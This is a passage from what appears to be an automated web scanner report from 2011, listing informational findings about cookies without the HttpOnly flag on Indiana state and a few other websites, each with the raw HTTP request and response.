Path:   /portal/global/javascript/9.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/javascript/9.js HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:52 GMT
Server: Apache
Last-Modified: Tue, 26 Jan 2010 16:16:45 GMT
ETag: "cac869-3f72-47e139cae7540"
Accept-Ranges: bytes
Content-Length: 16242
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:52 GMT; path=/

...
//Script for Find a Agency page.
/***********************************************
* Advanced Gallery script- .. Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice must stay inta
...[SNIP]...

14.583. http://www.in.gov/portal/images/amberalert.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/amberalert.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/amberalert.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:59 GMT
Server: Apache
Last-Modified: Wed, 22 Apr 2009 14:59:41 GMT
ETag: "634e72-1b51-4682603583140"
Accept-Ranges: bytes
Content-Length: 6993
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:59 GMT; path=/

......JFIF.....H.H.....C.............................
......
.

.

.....................C........

.............................................................5...................................
...[SNIP]...

14.584. http://www.in.gov/portal/images/amberalerttest.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/amberalerttest.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/amberalerttest.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:59 GMT
Server: Apache
Last-Modified: Wed, 22 Apr 2009 14:59:41 GMT
ETag: "63406f-157f-4682603583140"
Accept-Ranges: bytes
Content-Length: 5503
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:59 GMT; path=/

......JFIF.....H.H.....C.............................
......
.

.

.....................C........

.............................................................5...................................
...[SNIP]...

14.585. http://www.in.gov/portal/images/govdev_icon0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/govdev_icon0.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/govdev_icon0.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:57 GMT
Server: Apache
Last-Modified: Mon, 14 Mar 2011 20:57:49 GMT
ETag: "2a284-15b-49e7790792d40"
Accept-Ranges: bytes
Content-Length: 347
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:57 GMT; path=/

GIF89a.....).SSSMMMRRR...............xxx...fff..................|||YYY.......................................ggg........................................................................................
...[SNIP]...

14.586. http://www.in.gov/portal/images/horz_nav2_bg_solid.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/horz_nav2_bg_solid.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/horz_nav2_bg_solid.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:04 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2010 03:58:12 GMT
ETag: "5f90f7-dae-493f5d1255d00"
Accept-Ranges: bytes
Content-Length: 3502
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:04 GMT; path=/

......JFIF.....H.H.....C.............................
......
.

.

.....................C........

.................................................................................................
...[SNIP]...

14.587. http://www.in.gov/portal/images/link.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/link.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/link.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:59 GMT
Server: Apache
Last-Modified: Mon, 14 Mar 2011 20:57:49 GMT
ETag: "1c875c-225-49e7790792d40"
Accept-Ranges: bytes
Content-Length: 549
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:59 GMT; path=/

GIF89a..................................bbb^^^ggg.......................................NNN...YYY...ddd...iii....................................ooo............rrrvvv.........lll......jjj......mmm...]
...[SNIP]...

14.588. http://www.in.gov/portal/images/linkhover.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/linkhover.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/linkhover.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; WT_FPC=id=173.193.214.243-3084977536.30148309:lv=1304175874332:ss=1304175862985; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:33 GMT
Server: Apache
Last-Modified: Mon, 14 Mar 2011 20:57:49 GMT
ETag: "1c8755-225-49e7790792d40"
Accept-Ranges: bytes
Content-Length: 549
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:33 GMT; path=/

GIF89a.....D....iiimmmqqq...ggg......aaa&&&###***QQQccc...yyypppzzz.........]]]kkk..................'''ZZZ+++.........rrrjjj............WWW......000lll......ddd333777..................,,,......///..."
...[SNIP]...

14.589. http://www.in.gov/portal/images/mail.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/mail.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/mail.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:59 GMT
Server: Apache
Last-Modified: Mon, 14 Mar 2011 20:57:49 GMT
ETag: "634070-8d-49e7790792d40"
Accept-Ranges: bytes
Content-Length: 141
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:59 GMT; path=/

GIF89a...............................yyy.....................!.....
.,..........:P.I..t..{.I(..f.$y.[".A..B.&DQ.a....L....).2yD0S..g..`..J..;

14.590. http://www.in.gov/portal/images/mobile-icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/mobile-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/mobile-icon.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:57 GMT
Server: Apache
Last-Modified: Mon, 14 Mar 2011 20:57:49 GMT
ETag: "96226e-24a-49e7790792d40"
Accept-Ranges: bytes
Content-Length: 586
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:57 GMT; path=/

GIF89a.....I..>..7..p..-..T..)..+....Q.Z.X..t.j/t...g)qq$~...`Ub...c"n ."xR......W#_...PPPs=|@@@....Z.......wE.p.i,s.k.i"u.......V..w.....;....{*.|+.i"vq/|...a m......q:z......a*jz(.y'........b.....
...[SNIP]...

14.591. http://www.in.gov/portal/images/print.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/print.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/print.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:59 GMT
Server: Apache
Last-Modified: Mon, 14 Mar 2011 20:57:49 GMT
ETag: "1c875d-98-49e7790792d40"
Accept-Ranges: bytes
Content-Length: 152
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:59 GMT; path=/

GIF89a................zzz............yyy.....................!.....    .,..........E0I...s..;G.u\..n^gf.5bb.....dQ[F..>.....z..p    ....Z........d.....e..D..;

14.592. http://www.in.gov/portal/images/rate.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/rate.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/rate.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:59 GMT
Server: Apache
Last-Modified: Mon, 14 Mar 2011 20:57:49 GMT
ETag: "5278e8-159-49e7790792d40"
Accept-Ranges: bytes
Content-Length: 345
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:59 GMT; path=/

GIF89a.............RRR....................................ttt......III...........................{{{...................................................%%%.......................................yyy....
...[SNIP]...

14.593. http://www.in.gov/portal/images/rss_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/rss_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/rss_logo.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:57 GMT
Server: Apache
Last-Modified: Mon, 14 Mar 2011 20:57:48 GMT
ETag: "1ba971-3fb-49e779069eb00"
Accept-Ranges: bytes
Content-Length: 1019
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:57 GMT; path=/

GIF89a...........................=.....z..............t........m.~_..t.....y..y..@...........7..5.....@..A.......................I..2...........{...........E..C....................w...........n.._....
...[SNIP]...

14.594. http://www.in.gov/portal/images/search_button.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/images/search_button.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/search_button.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:01 GMT
Server: Apache
Last-Modified: Mon, 14 Mar 2011 20:57:49 GMT
ETag: "1c8760-749-49e7790792d40"
Accept-Ranges: bytes
Content-Length: 1865
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:01 GMT; path=/

......JFIF.....H.H.....C............................................        

       ..................C.......    ..    .    ..........................................................D.................................
...[SNIP]...

14.595. http://www.in.gov/recycle/5636.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /recycle/5636.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /recycle/5636.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:03 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:03 GMT; path=/
Content-Length: 24700

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 5636 - publ
...[SNIP]...

14.596. http://www.indianacareerconnect.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indianacareerconnect.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.indianacareerconnect.com
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Sat, 30 Apr 2011 15:03:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO PSA OUR
Location: https://www.indianacareerconnect.com/
Content-Length: 158
Content-Type: text/html; Charset=iso-8859-1
Expires: Wed, 20 Apr 2011 15:03:40 GMT
Set-Cookie: SID=43F8FCCDA5E944719912B946EA147FD7; path=/
Cache-control: no-cache

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.indianacareerconnect.com/">here</a>.</body>

14.597. https://www.mcafeesecure.com/RatingVerify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mcafeesecure.com
Path:   /RatingVerify

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RatingVerify?ref=home.mcafee.com&lang=EN HTTP/1.1
Host: www.mcafeesecure.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: McAfeeSecure
Vary: Accept-Encoding
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: LANG=EN; path=/; expires=Mon, 05-Jan-2043 23:05:25 GMT
Set-Cookie: CAMEFROM=home.mcafee.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 29 Apr 2011 21:18:46 GMT
Set-Cookie: resin=1758093834.20480.0000; path=/
Content-Length: 10349


<html>
<head>

<!-- Google Website Optimizer Control Script -->
<script>
function utmx_section(){}function utmx(){}
(function(){var k='1568676568',d=document,l=d.location,c=d.cookie;fun
...[SNIP]...

14.598. http://www.mdod.maryland.gov/WorkArea/linkit.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mdod.maryland.gov
Path:   /WorkArea/linkit.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WorkArea/linkit.aspx HTTP/1.1
Host: www.mdod.maryland.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:39:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /login.aspx?id=0
Set-Cookie: ASP.NET_SessionId=qrpge1553qol4fikr0jjfm55; path=/; HttpOnly
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 139

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2flogin.aspx%3fid%3d0">here</a>.</h2>
</body></html>

14.599. http://www.michie.com/tennessee/lpext.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michie.com
Path:   /tennessee/lpext.dll

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tennessee/lpext.dll HTTP/1.1
Host: www.michie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: www.michie.com 9999
Date: Sat, 30 Apr 2011 12:39:17 GMT
IISExport: This web site was exported using IIS Export v4.1
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: no-cache
Expires: fri, 29 jun 1973 12:00:00 GMT
Content-Length: 592
Set-Cookie: tennessee/lpext.dll/uid=4DBC1AF3; path=/;
Set-Cookie: tennessee/lpext.dll/sid=4DBC1AF4; path=/;
Connection: close
Set-Cookie: BIGipServerlng-ln-michie-http-25577=841011210.59747.0000; path=/
X-RE-Ref: 1 338057239
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
   <meta name="template-type" content="lp-component-error">
   <meta http-equiv="Content-Type" content="text/html; char
...[SNIP]...

14.600. http://www.michigan.org/Partners/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michigan.org
Path:   /Partners/Default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Partners/Default.aspx HTTP/1.1
Host: www.michigan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie:WEBTRENDS_ID=173.193.214.243-2404771712.30148403; expires=Sun, 29-Apr-2012 12:38:51 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:38:51 GMT
X-AspNet-Version: 2.0.50727
